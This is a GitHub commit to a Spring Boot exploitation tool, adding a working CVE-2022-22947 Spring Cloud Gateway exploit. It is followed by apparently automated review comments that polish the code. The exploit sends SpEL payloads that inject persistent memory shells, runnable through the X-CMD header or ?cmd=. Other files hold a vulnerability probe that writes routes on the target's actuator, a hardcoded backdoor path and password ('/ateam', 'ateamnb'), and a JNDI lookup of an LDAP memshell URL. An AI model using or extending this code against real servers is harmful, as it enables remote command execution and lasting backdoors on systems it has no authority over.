This repository has been archived by the owner on Jul 25, 2024. It is now read-only.

更新1.3版本,支持SpringCloudGatewayRCE
SummerSec committed Apr 17, 2022

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
1 parent f0ac6b0 commit e9dcb1b
Showing 14 changed files with 537 additions and 11 deletions.
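--- a/.github/workflows/maven.yml
+++ b/.github/workflows/maven.yml
@@ -0,0 +1,61 @@
+name: Release Maven
+
+
+
+on:
+push:
+tags:
+- '*'
+#on: [push]
+
+
+
+jobs:
+build:
+runs-on: ubuntu-latest
+
+steps:
+- uses: actions/checkout@v2
+- name: Set up JDK 1.8
+uses: actions/setup-java@v1
+with:
+distribution: "Liberica"
+java-version: 1.8
+java-package: jdk+fx
+- name: Build with Maven
+run:
+mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V
+- name: Create Release
+id: create_release
+uses: SummerSec/create-release@master
+with:
+tag_name: ${{ github.ref }}
+release-name: Release ${{ github.ref }}
+draft: false
+prerelease: false
+env:
+GITHUB_TOKEN: ${{ secrets.RELEASE }}
+
+
+- name: Upload a Build Artifact
+id: upload-build-artifact
+uses: actions/upload-artifact@v2.3.1
+with:
+# Artifact name
+name: # optional, default is artifact
+SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar
+# A file, directory or wildcard pattern that describes what to upload
+path:
+target/*-SNAPSHOT-all.jar
+# The desired behavior if no files are found using the provided path.
+
+- name: Auto Upload Release
+id: upload-release-asset
+uses: actions/upload-release-asset@v1.0.1
+env:
+GITHUB_TOKEN: ${{secrets.RELEASE}}
+with:
+upload_url: ${{ steps.create_release.outputs.upload_url }}
+asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar
+asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar
+asset_content_type: application/java-archive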
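Review bot: The `Create Release` step runs `SummerSec/create-release@master`, a mutable branch reference, and passes it `secrets.RELEASE`, so whatever that branch points to at run time executes with the release token. Pin it to a full commit SHA, `uses: SummerSec/create-release@<full-commit-sha>`, and do the same for the other `uses:` entries, which are referenced by tag. The workflow declares no `permissions:` block; if the default `GITHUB_TOKEN` with `permissions:` / `contents: write` is enough to publish the release, the separate `RELEASE` secret can be dropped. The absolute `asset_path` under `/home/runner/work/SPATool/SPATool/` breaks in a fork or after a rename; `${{ github.workspace }}/target/...` avoids that.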
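--- a/pom.xml
+++ b/pom.xml
@@ -7,7 +7,7 @@
 <groupId>org.example</groupId>
 <artifactId>SpringBootExploit</artifactId>
 <!-- <packaging>jar</packaging>-->
-<version>1.2-SNAPSHOT</version>
+<version>1.3-SNAPSHOT</version>
 
 
 <!-- <properties>-->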
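--- a/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java
+++ b/src/main/java/com/drops/exp/SpringCloudGatewayRCEEXP.java
@@ -0,0 +1,65 @@
+package com.drops.exp;
+
+import com.drops.utils.HTTPUtils;
+import com.drops.utils.StringRandom;
+
+/**
+* @ClassName: SpringCloudGatewayRCEEXP
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/4/17 19:56
+* @Version: v1.0.0
+* @Description: 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/
+**/
+public class SpringCloudGatewayRCEEXP {
+final static String mem = "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";
+
+
+final static String mem1 = "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";
+
+final static String NettyMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}", mem);
+
+final static String SpringRequestMappingMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}",mem1);
+
+
+public boolean execute(String target, String type){
+String endpoint = "s" + StringRandom.getRandomString(5);
+String body = String.format("{\n" +
+" \"id\": \"%s\",\n" +
+" \"filters\": [{\n" +
+" \"name\": \"AddResponseHeader\",\n" +
+" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" +
+" }],\n" +
+" \"uri\": \"%s\",\n" +
+" \"order\": 0\n" +
+"}", endpoint, type, target);
+
+HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString();
+HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString();
+HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString();
+HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint).toString();
+HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString();
+String header = "X-CMD: echo "+ endpoint;
+
+String re6 = HTTPUtils.postRequestV1(target, "?cmd=echo "+ endpoint, header).toString();
+// System.out.println("re6 = " + re6);
+if (re6.toLowerCase().contains(endpoint)){
+// System.out.println(String.format("[+] %s inject success", type));
+return true;
+}
+return false;
+}
+
+public boolean exp(String target){
+
+if (execute(target,NettyMemshell)){
+System.out.println("[+] NettyMemshell inject success");
+return true;
+}else if (execute(target,SpringRequestMappingMemshell)){
+System.out.println("[+] SpringRequestMappingMemshell inject success");
+return true;
+}
+return false;
+}
+
+}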
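Review bot: The class header is still `@Description: TODO` and `execute` has no Javadoc, although the method changes state on the remote gateway: it writes a route through `actuator/gateway/routes/`, triggers `actuator/gateway/refresh`, and the filter value is a SpEL expression that calls `ReflectUtils.defineClass(...)` and `doInject()` inside the gateway's JVM. The DELETE and second refresh only concern the route; nothing visible here removes the defined class, so the injected handler presumably stays active until the process restarts. I would record that on the method, e.g. `/** Registers a temporary route whose filter argument is evaluated as SpEL; the route is deleted afterwards, the class defined by the expression is not. */`. Naming the issue in the header as well (the POC class in this commit cites CVE-2022-22947) lets a reader map the code to the vendor advisory and its fix.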
15 changes: 12 additions & 3 deletions src/main/java/com/drops/main/AttackService.java
@@ -96,16 +96,25 @@ public boolean gadgetSend(String target, String vps, String gadget, String[] por

}
}
if (gadget.equalsIgnoreCase("SpringCloudGatewayRCE")){
System.out.println("SpringCloudGatewayRCE " + System.currentTimeMillis());
try {
SpringCloudGatewayRCEEXP exp = new SpringCloudGatewayRCEEXP();
return exp.exp(target);
}catch (Exception e){
e.printStackTrace();
}
}


}catch (Exception e){
e.printStackTrace();
return false;
}

return false;
}


public void setPOCRequest(String target, String vps, String gadget,String echo){

}

}
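Review bot: The inner `try`/`catch (Exception e)` around `exp.exp(target)` appears to duplicate the outer handler at the end of the hunk, which already catches `Exception`, prints the stack trace and returns false; the inner one only prints and falls through to the same `return false`. Dropping it keeps the behaviour and removes a nesting level. `System.out.println("SpringCloudGatewayRCE " + System.currentTimeMillis())` looks like leftover debug output, and the literal `"SpringCloudGatewayRCE"` is repeated in `MainController`, so a shared constant would keep the spellings from drifting. `gadgetSend` begins above the hunk, so its earlier branches are not visible here.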
9 changes: 7 additions & 2 deletions src/main/java/com/drops/poc/SpringBootInfoCheck.java
@@ -108,11 +108,14 @@ void checkEnvPointV1(String addr){
JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC();
JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC();
logbackRCEPOC.hasJolokiaLogbackRCE(url);
Boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);
boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url);
if(!f){
H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC();
if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){
SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC();
if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){

}
}

}
@@ -133,10 +136,12 @@ void checkEnvPointV2(String addr){
JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC();
JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC();
if(!logbackRCEPOC.hasJolokiaLogbackRCE(url) || realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url)){

H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC();
if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){
SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC();
if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){

}
}

}
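Review bot: Both `checkEnvPointV1` and `checkEnvPointV2` wrap `gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)` in an `if (!…) { }` with an empty body, so the result is discarded and the `if` only adds nesting; call it as a plain statement or put the intended follow-up in the block. Unlike a read-only probe, that method POSTs a route and a refresh to the target's actuator (see `SpringCloudGatewayRCEPOC` in this commit), and here it runs automatically once the H2 check is negative. I would mark that with a comment such as `// state-changing check: creates and refreshes a gateway route on the target`, or gate it behind an explicit option. It is also passed `addr` where the neighbouring checks receive `url`; how `url` is derived is outside both hunks, so confirm that is intended.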
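--- a/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java
+++ b/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java
@@ -0,0 +1,63 @@
+package com.drops.poc;
+
+import com.drops.entity.ControllersFactory;
+import com.drops.ui.MainController;
+import com.drops.utils.HTTPUtils;
+import com.drops.utils.StringRandom;
+import com.drops.utils.Utils;
+
+import java.util.Locale;
+
+/**
+* @ClassName: SpringCloudGatwayRCEPOC
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/4/17 16:55
+* @Version: v1.0.0
+* @Description:
+CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE
+**/
+public class SpringCloudGatewayRCEPOC {
+
+private final MainController mainController;
+
+public SpringCloudGatewayRCEPOC( ) {
+this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
+
+}
+
+public boolean hasSpringCloudGatewayRCEPOC(String target) {
+String endpoint = "s" + StringRandom.getRandomString(5);
+String body = String.format("{\n" +
+" \"id\": \"%s\",\n" +
+" \"filters\": [{\n" +
+" \"name\": \"AddResponseHeader\",\n" +
+" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" +
+" }],\n" +
+" \"uri\": \"%s\",\n" +
+" \"order\": 0\n" +
+"}", endpoint, endpoint, target);
+
+String re1 = HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString();
+String re2 = HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString();
+String re3 = HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString();
+System.out.println("re1 = " + re1);
+System.out.println("re2 = " + re2);
+System.out.println("re3 = " + re3);
+if (re3.toLowerCase().contains(endpoint.toLowerCase())) {
+this.mainController.logTextArea.appendText(Utils.log("存在SpringCloudGatewayRCEPOC漏洞\n"));
+return true;
+}else {
+this.mainController.logTextArea.appendText(Utils.log("不存在SpringCloudGatewayRCEPOC漏洞\n"));
+}
+HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint);
+HTTPUtils.postRequestV1(target , "actuator/gateway/refresh");
+return false;
+}
+
+
+
+
+
+
+}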
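Review bot: When the route shows up in the GET response, `hasSpringCloudGatewayRCEPOC` returns true before it reaches the `deleteRequest`/refresh pair at the end, so the probe route is only cleaned up on hosts reported as not vulnerable and stays registered on the ones that are. Move the cleanup into a `finally` so both paths run it: `try { … } finally { HTTPUtils.deleteRequest(target, "actuator/gateway/routes/" + endpoint); HTTPUtils.postRequestV1(target, "actuator/gateway/refresh"); }`. The filter value sent here is the plain random id, so a match shows that the actuator accepts route writes rather than that an expression was evaluated; the log message should say that instead of reporting the CVE outright. The three `System.out.println("reN = …")` lines dump full target responses to stdout and look like debug leftovers, and the Javadoc name `SpringCloudGatwayRCEPOC` is misspelled.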
18 changes: 13 additions & 5 deletions src/main/java/com/drops/ui/MainController.java
@@ -124,7 +124,7 @@ private void initConnect() {


private void initComBoBox() {
ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE"});
ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE", "SpringCloudGatewayRCE"});
this.gadgetOpt.setPromptText("SnakeYAMLRCE");
this.gadgetOpt.setValue("SnakeYAMLRCE");
this.gadgetOpt.setItems(gadgets);
@@ -303,11 +303,19 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) {
boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(),
this.vps.getText(),this.gadgetOpt.getValue(),this.getPorts());
if(flag){
if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !"));
this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb"));
System.out.println(this.gadgetOpt.getValue());
if (this.gadgetOpt.getValue().equalsIgnoreCase("SpringCloudGatewayRCE")){
this.logTextArea.appendText(Utils.log(" SpringCloudGateway 漏洞利用成功"));
this.logTextArea.appendText(Utils.log(" 请自行检查是NettyMemshell 还是 SpringRequestMappingMemshell!"));
this.logTextArea.appendText(Utils.log(" 如果是SpringRequestMappingMemshell,/?cmd={cmd} 执行命令"));
this.logTextArea.appendText(Utils.log(" 如果是NettyMemshell,header头 X-CMD: {cmd} 执行命令"));
}else {
this.logTextArea.appendText(Utils.log("漏洞利用失败!\t"));
if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !"));
this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb"));
}else {
this.logTextArea.appendText(Utils.log("漏洞利用失败!\t"));
}
}
}else {
this.logTextArea.appendText(Utils.log("漏洞利用失败!\t"));
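Review bot: In `crackSpcGadgetBtn` the added `System.out.println(this.gadgetOpt.getValue());` looks like debug output and should be removed or sent to the log area like the neighbouring messages. The comparison `this.gadgetOpt.getValue().equalsIgnoreCase("SpringCloudGatewayRCE")` is safer with the literal first, `"SpringCloudGatewayRCE".equalsIgnoreCase(this.gadgetOpt.getValue())`, and the same literal is spelled out again in `initComBoBox` and in `AttackService`, so one constant would serve all three. The method begins above the hunk, so how `flag` is used earlier is not visible.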
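--- a/src/main/java/com/drops/utils/HTTPUtils.java
+++ b/src/main/java/com/drops/utils/HTTPUtils.java
@@ -33,6 +33,21 @@ public HTTPUtils(int Timeout){
 HttpGlobalConfig.setTimeout(Timeout);
 }
 
+public static HttpResponse deleteRequest(String target, String s) {
+String url = URLUtil.normalizeURL(target);
+Proxy proxy = (Proxy) MainController.currentProxy.get("proxy");
+HttpResponse result = null;
+if (proxy == null){
+result = HttpRequest.delete(url).execute();
+}else {
+result = HttpRequest.delete(url).setProxy(proxy).execute();
+}
+
+return result;
+}
+
+
+
 public void setTimeout(int Timeout){
 HttpGlobalConfig.setTimeout(Timeout);
 }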
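Review bot: `deleteRequest` never uses its second parameter: the URL is built from `target` alone, so callers that pass a route path (`"actuator/gateway/routes/" + endpoint` in the two new classes) end up sending DELETE to the base URL. That leaves the created route in place and issues an unintended DELETE against the application root of the system under test. Build the URL from both `target` and `s` the same way the other request helpers in this class do (their bodies are outside the hunk), and rename `s` to something descriptive such as `path`. The `HttpResponse result = null;` plus if/else can also collapse into building the request once and calling `setProxy(proxy)` only when `proxy != null`.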
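--- a/src/main/java/com/drops/utils/StringRandom.java
+++ b/src/main/java/com/drops/utils/StringRandom.java
@@ -0,0 +1,30 @@
+package com.drops.utils;
+
+/**
+* @ClassName: StringRandom
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/4/17 19:43
+* @Version: v1.0.0
+* @Description:
+**/
+public class StringRandom {
+
+/**
+* @Description: 获取随机字符串
+* @Param: [length]
+* @return: java.lang.String
+*
+*/
+public static String getRandomString(int length) {
+String base = "abcdefghijklmnopqrstuvwxyz0123456789";
+int size = base.length();
+StringBuilder sb = new StringBuilder();
+for (int i = 0; i < length; i++) {
+int number = (int) (Math.random() * size);
+sb.append(base.charAt(number));
+}
+return sb.toString();
+}
+
+}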
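Review bot: `getRandomString` draws from `Math.random()`, which is not a cryptographically strong source, and the Javadoc does not say so. In this commit the result is only used as a route id, where that is fine, but a utility with this name invites reuse; add a line to the method comment such as `Not suitable for tokens or secrets; use java.security.SecureRandom for those.` A negative `length` silently yields an empty string, so either state that in the comment or reject it with an `IllegalArgumentException`.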
Binary file added src/test/java/0cat.class
Binary file not shown.
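Review bot: `src/test/java/0cat.class` is a compiled class committed without its source, so its contents cannot be reviewed here, and nothing in the visible diff references it. If it is a fixture, commit the `.java` it was built from, or document its origin and a checksum next to it. Otherwise drop it from the commit and add `*.class` to `.gitignore` so build output does not land in the source tree again.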
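--- a/src/test/java/Client.java
+++ b/src/test/java/Client.java
@@ -0,0 +1,32 @@
+/**
+* @ClassName: Client
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/8/2 10:53
+* @Version: v1.0.0
+* @Description:
+**/
+import java.io.IOException;
+import java.net.Socket;
+import java.net.UnknownHostException;
+import java.util.Hashtable;
+
+import javax.naming.Context;
+import javax.naming.NamingEnumeration;
+import javax.naming.directory.Attribute;
+import javax.naming.directory.Attributes;
+import javax.naming.directory.DirContext;
+import javax.naming.directory.InitialDirContext;
+import javax.naming.directory.SearchControls;
+import javax.naming.directory.SearchResult;
+
+public class Client {
+// public static void main(String[] args) {
+// demo d = new demo();
+// d.setDemo();
+// if (d.isFlag()){
+// System.out.println("sad");
+// }
+// }
+}
+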
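--- a/src/test/java/LdapClient.java
+++ b/src/test/java/LdapClient.java
@@ -0,0 +1,170 @@
+/**
+* @ClassName: LdapClient
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/8/2 11:00
+* @Version: v1.0.0
+* @Description:
+**/
+import java.util.Properties;
+import javax.naming.NamingException;
+import javax.naming.NamingEnumeration;
+import javax.naming.directory.*;
+import javax.naming.ldap.*;
+
+/**
+* Created by baikai on 8/17/16.
+*/
+public class LdapClient {
+
+private String ldapUrl;
+private String ldapUserDN;
+private String ldapPwd;
+
+public LdapClient(String ldapUrl, String ldapUserDN, String ldapPwd){
+this.ldapUrl = ldapUrl;
+this.ldapUserDN = ldapUserDN;
+this.ldapPwd = ldapPwd;
+}
+
+/**
+* Create LDAP user
+* @param userName
+* @param password
+* @param uidNumber
+* @param gidNumber
+*/
+public void createLDAPUser(String userName, String password, String uidNumber, String gidNumber){
+LdapContext context = this.initLDAPContext();
+Attributes matchAttrs = new BasicAttributes(true);
+BasicAttribute objclassSet = new BasicAttribute("objectClass");
+objclassSet.add("account");
+objclassSet.add("posixAccount");
+matchAttrs.put(objclassSet);
+matchAttrs.put(new BasicAttribute("uid", userName));
+matchAttrs.put(new BasicAttribute("cn", userName));
+matchAttrs.put(new BasicAttribute("uidNumber", uidNumber));
+matchAttrs.put(new BasicAttribute("gidNumber", gidNumber));
+matchAttrs.put(new BasicAttribute("homeDirectory", "/home/" + userName));
+matchAttrs.put(new BasicAttribute("userpassword", password));
+matchAttrs.put(new BasicAttribute("description", "LDAP user."));
+
+try {
+context.bind("uid=" + userName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs);
+} catch (NamingException e) {
+e.printStackTrace();
+}finally {
+this.closeLdapContext(context);
+}
+}
+
+/**
+* Create LDAP user group
+* @param groupName
+* @param password
+* @param gidNumber
+*/
+public void createLDAPUserGroup(String groupName, String password, String gidNumber){
+LdapContext context = this.initLDAPContext();
+Attributes matchAttrs = new BasicAttributes(true);
+matchAttrs.put(new BasicAttribute("objectclass", "posixGroup"));
+matchAttrs.put(new BasicAttribute("cn", groupName));
+matchAttrs.put(new BasicAttribute("gidNumber", gidNumber));
+matchAttrs.put(new BasicAttribute("userPassword", password));
+try {
+context.bind("cn=" + groupName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs);
+} catch (NamingException e) {
+e.printStackTrace();
+}finally {
+this.closeLdapContext(context);
+}
+}
+
+/**
+* Delete LDAP user
+* @param userName
+*/
+public void deleteLDAPUser(String userName){
+LdapContext context = this.initLDAPContext();
+try {
+context.unbind(userName);
+} catch (NamingException e) {
+e.printStackTrace();
+}finally {
+this.closeLdapContext(context);
+}
+}
+
+/**
+* Delete LDAP user group
+* @param groupName
+*/
+public void deleteLDAPUserGroup(String groupName){
+this.deleteLDAPUser(groupName);
+}
+
+/**
+* Modify LDAP user attribute with new value
+* @param userName
+* @param attributeName
+* @param attributeNewValue
+*/
+public void updateLDAPUserAttribute(String userName, String attributeName, String attributeNewValue){
+LdapContext context = this.initLDAPContext();
+ModificationItem[] mods = new ModificationItem[1];
+mods[0] = new ModificationItem(context.REPLACE_ATTRIBUTE, new BasicAttribute(attributeName, attributeNewValue));
+try{
+context.modifyAttributes(userName, mods);
+}catch (NamingException e) {
+e.printStackTrace();
+}finally {
+this.closeLdapContext(context);
+}
+}
+
+/**
+* Search LDAP users by user dn and filter
+* @param userName
+* @param filter
+* @return NamingEnumeration<SearchResult>
+*/
+public NamingEnumeration<SearchResult> searchLDAPUser(String userName, String filter){
+NamingEnumeration<SearchResult> searchResults = null;
+LdapContext context = this.initLDAPContext();
+SearchControls ctrl = new SearchControls();
+ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE);
+try {
+searchResults = context.search(userName, filter, ctrl);
+} catch (NamingException e) {
+e.printStackTrace();
+}finally {
+this.closeLdapContext(context);
+}
+return searchResults;
+}
+
+private LdapContext initLDAPContext(){
+LdapContext context = null;
+Properties mEnv = new Properties();
+mEnv.put(LdapContext.AUTHORITATIVE, "true");
+mEnv.put(LdapContext.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
+mEnv.put(LdapContext.PROVIDER_URL, this.ldapUrl);
+mEnv.put(LdapContext.SECURITY_AUTHENTICATION, "simple");
+mEnv.put(LdapContext.SECURITY_PRINCIPAL, this.ldapUserDN);
+mEnv.put(LdapContext.SECURITY_CREDENTIALS, this.ldapPwd);
+try {
+context = new InitialLdapContext(mEnv,null);
+} catch (NamingException e) {
+e.printStackTrace();
+}
+return context;
+}
+
+private void closeLdapContext(LdapContext context){
+try {
+context.close();
+} catch (NamingException e) {
+e.printStackTrace();
+}
+}
+}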
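Review bot: `createLDAPUser` and `createLDAPUserGroup` build the DN by concatenation, so a name containing `,`, `+` or `=` changes the DN structure; escape the value with `Rdn.escapeValue`, which is already in scope through `javax.naming.ldap.*`: `context.bind("uid=" + Rdn.escapeValue(userName) + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs);`. `initLDAPContext` returns null when `InitialLdapContext` throws, and every caller then dereferences it and hands it to `closeLdapContext`, turning a connection failure into a `NullPointerException`; let the `NamingException` propagate or null-check before use. `searchLDAPUser` returns the `NamingEnumeration` after its `finally` has closed the context, so callers may be unable to iterate it. The context uses `simple` authentication, which sends the password in clear unless `ldapUrl` is an `ldaps://` URL, and that deserves a line in the constructor Javadoc.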
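--- a/src/test/java/gateway.java
+++ b/src/test/java/gateway.java
@@ -0,0 +1,37 @@
+import com.drops.utils.StringRandom;
+
+/**
+* @ClassName: gateway
+* @Description: TODO
+* @Author: Summer
+* @Date: 2022/4/17 19:46
+* @Version: v1.0.0
+* @Description:
+**/
+public class gateway {
+public static void main(String[] args) {
+String endpoint = "s" + StringRandom.getRandomString(5);
+String body = String.format("{\n" +
+" \"id\": \"%s\",\n" +
+" \"filters\": [{\n" +
+" \"name\": \"AddResponseHeader\",\n" +
+" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" +
+" }],\n" +
+" \"uri\": \"http://example.com\",\n" +
+" \"order\": 0\n" +
+"}", endpoint, endpoint);
+
+System.out.println(body);
+
+
+String res = "Response Headers: \n" +
+" null=[HTTP/1.1 200 OK]\n" +
+" Content-Length=[7]\n" +
+" Content-Type=[text/html;charset=UTF-8]\n" +
+"Response Body: \n" +
+" s0gjvh";
+System.out.println(res.contains("s0gjvh"));
+
+}
+
+}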
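--- a/src/test/java/spel.java
+++ b/src/test/java/spel.java
@@ -0,0 +1,31 @@
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+import java.lang.reflect.InvocationTargetException;
+
+/**
+* @ClassName: spel
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/8/23 11:39
+* @Version: v1.0.0
+* @Description:
+**/
+public class spel {
+public static void main(String[] args) {
+try {
+// javax.naming.InitialContext context = new InitialContext();
+// context.lookup("ldap://127.0.0.1:1389/basic/TomcatMemShell3");
+
+java.lang.Class.forName("javax.naming.InitialContext").getMethod("lookup", String.class).invoke(Class.forName("javax.naming.InitialContext").newInstance(),"ldap://127.0.0.1:1389/basic/TomcatMemShell3");
+// new javax.naming.InitialContext().lookup("");
+} catch ( ClassNotFoundException | NoSuchMethodException e) {
+e.printStackTrace();
+} catch (InvocationTargetException e) {
+e.printStackTrace();
+} catch (IllegalAccessException e) {
+e.printStackTrace();
+} catch (InstantiationException e) {
+e.printStackTrace();
+}
+}
+}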
